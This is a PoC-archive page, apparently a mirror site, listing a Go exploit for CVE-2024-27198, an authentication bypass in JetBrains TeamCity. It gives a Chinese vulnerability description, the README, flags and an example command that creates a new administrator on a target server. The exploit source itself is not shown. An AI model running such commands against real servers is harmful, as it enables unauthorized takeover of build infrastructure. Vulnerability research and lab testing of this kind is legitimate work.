Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-27198 PoC — JetBrains TeamCity 安全漏洞

Source
Associated Vulnerability
Title:JetBrains TeamCity 安全漏洞 (CVE-2024-27198)
Description:JetBrains TeamCity是捷克JetBrains公司的一套分布式构建管理和持续集成工具。该工具提供持续单元测试、代码质量分析和构建问题分析报告等功能。 JetBrains TeamCity 2023.11.4之前版本存在安全漏洞,该漏洞源于存在身份验证绕过漏洞。
Description
A PoC for CVE-2024-27198 written in golang
Readme
## CVE-2024-27198

### Auth bypass for TeamCity Server version 2023.11.3 and below.

![image](https://github.com/rampantspark/CVE-2024-27198/assets/80992075/1b6dceb9-d0fa-46af-8667-d68f425fa29f)


**NIST:** https://nvd.nist.gov/vuln/detail/CVE-2024-27198

**Rapid7 blog post:** https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

### Example Usage

```
go run CVE-2024-27198.go -h
  -s string
    	TeamCity Server
  -p string
    	New admin password
  -u string
    	New admin username
  -proxy
        Proxy URL (optional)
```

```
go run CVE-2024-27198.go -s http://IP_OR_FQDN:PORT -u new_admin_username -p new_admin_password -proxy http://IP_OR_FQDN:PORT
```


*Please Refer to https://github.com/yoryio/CVE-2024-27198 for instructions on setting up a lab environment.
File Snapshot

[4.0K] /data/pocs/06f57a384443c886fffaa65904b297b11b6bea2c ├── [3.9K] CVE-2024-27198.go └── [ 876] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.